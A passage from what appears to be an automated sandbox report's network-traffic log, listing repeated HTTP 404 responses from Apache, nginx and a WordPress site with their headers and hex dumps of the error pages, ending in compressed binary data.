77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:54:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:54:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:54:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 14:54:57 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 14:55:00 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 14:55:03 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 14:55:06 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:55:09 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 14735Content-Type: text/html; charset=UTF-8Data Raw: 53 01 5d c1 8c 64 a5 b3 07 40 33 70 5c 8f 75 de 7f be aa df 7f 4b 33 ef e3 ff 18 da 48 64 0c 40 00 58 45 9a 4a f7 d6 5b 7d b3 cd d6 72 20 12 94 90 b0 3d 02 6a a1 f9 97 6f 5a 2a 04 77 65 bc 0f 22 63 69 c0 3b 1f 24 b2 b9 0f 77 9f e9 56 fd f9 33 28 cd 00 e4 15 0c 59 05 12 7b a2 17 7d 15 79 a6 df 7b fd bb 67 fe 0c b0 70 74 38 b7 fe 8c 5b ee 39 63 23 45 91 b3 91 82 4c 51 f6 87 72 b8 6c 15 64 17 ea 31 54 bb fb 0d 22 72 15 97 a6 f5 fd 61 ad d7 ea 3d ba d7 94 a3 04 92 90 86 0f ea 2e 43 d5 d9 c9 5e bc 1f 03 92 38 5f 08 58 97 b1 ac 96 ce 77 37 ef 6e 0b 21 89 80 10 11 10 e3 c4 0c 02 a6 b7 73 ae 01 93 ee 99 21 d5 76 10 77 e2 68 83 6b 9f ce 90 68 dd 26 62 b6 d3 92 3e 44 07 1d 7f 62 20 6b 73 06 43 4f 49 b2 9f 42 c6 d1 76 3e 83 87 5a b7 df 61 50 75 86 a8 b2 96 29 c0 64 0f 1d 9a fe 20 f1 4b af 55 bb e6 1c 6d a1 2a f5 14 18 77 0c da ce 02 a3 0a d0 da a3 9c a7 f0 91 d5 4b ba 3d 80 27 0a 8e 78 26 08 6f ad f4 6c bf 59 3d 2e ad 1a 79 3d da c6 34 e9 f9 d9 4a 38 fa 02 2b 58 6f e7 a4 2e ae ca d6 00 9d 53 29 5b 1c 57 f4 2e ad d6 eb 7d b3 a5 b9 07 a2 13 54 3e a7 ea 5a 6b a8 f5 1c 92 bd 36 fb 94 68 77 23 20 21 b6 8a d6 6a d7 c2 54 19 d0 06 8f f0 42 f0 a8 54 c9 e0 e1 09 e5 c5 5a 2f 1f 7d 6b 44 05 fb f9 15 31 e4 38 ed 15 74 f1 f1 71 66 b6 73 7d 7f bb f9 a5 57 4d f7 4d 3f 29 6b 31 1c 85 0c 46 64 20 0b 5f 87 3a 2c 5d 6a 92 97 f5 cb da d0 0b de ce cb fe 37 dd 97 b5 8f e8 bd ac 5f 3f 8f 97 35 f7 29 a3 ec 65 1d 89 6b 24 5e d6 08 23 75 b5 28 41 c6 f9 1a 80 30 32 e7 03 ce 39 73 3e 3c 1e 36 e7 c3 97 97 6f 30 e7 1f ed 4e 43 a1 2e 1b 51 d1 b5 85 b4 55 b9 0d bc b7 58 72 f2 65 7d e9 89 cb 38 f4 b2 fe 66 0a b1 76 9b f8 9e 36 8d 95 1f f9 ac 86 2c a4 3e 15 68 9a d2 f9 fa ed dd 51 1e c0 c4 0e 81 36 b0 03 54 9b 04 95 8b 55 09 6f d7 f3 bb dd 85 0e 3b 1a b7 be f1 82 0e 1b ac d2 6d df 0b 85 a3 e6 ec 70 db be 60 b3 d1 93 3c d3 1f ca 58 93 28 1c 77 a6 12 ef ce d7 55 f0 d2 93 fa a5 72 dc 29 35 5d fa b8 ba f6 c9 76 83 3c 28 6a 94 fd ab 55 8d d3 61 8f 5f 52 2f 7d be ae 6e 8e 75 dd c1 d3 29 e5 8e d3 44 c2 44 df c5 96 bc 9e a2 de ee 93 f8 5d 15 d6 61 98 61 45 0b d9 9e a5 a1 8e c6 17 f1 71 b6 3e 09 17 2b 5a e9 ba fe 43 5d ad 63 31 c3 2c 9c 75 6d 46 e9 07 fe aa 5b eb 89 0f c3 20 6f 8e a2 07 65 3d f6 83 fe 2c ad 44 df a2 bb 02 be bc 5c 3c 64 0e 5d b7 b7 db 02 53 e4 03 53 cf d2 08 24 f7 23 3a a0 b0 0d 94 7f 15 50 59 96 0d cf 76 37 b9 4c fe ea 13 45 8e 4b 1d eb 8e 85 34 0a c5 b4 19 94 54 06 54 5f 2c 7a 39 95 b1 57 bc 9c ca aa f2 5e 4e 95 62 d5 cb 49 30 56 be 9c 44 28 a3 d2 d1 10 e8 ce fb 47 e0 be bb e3 c9 1d ea eb cb 4a fe bd ae 87 36 13 a2 10 68 2b 77 b9 7c ff b6 aa f2 bf 6d ef b3 eb
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:55:11 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 14735Content-Type: text/html; charset=UTF-8Data Raw: 53 01 5d c1 8c 64 a5 b3 07 40 33 70 5c 8f 75 de 7f be aa df 7f 4b 33 ef e3 ff 18 da 48 64 0c 40 00 58 45 9a 4a f7 d6 5b 7d b3 cd d6 72 20 12 94 90 b0 3d 02 6a a1 f9 97 6f 5a 2a 04 77 65 bc 0f 22 63 69 c0 3b 1f 24 b2 b9 0f 77 9f e9 56 fd f9 33 28 cd 00 e4 15 0c 59 05 12 7b a2 17 7d 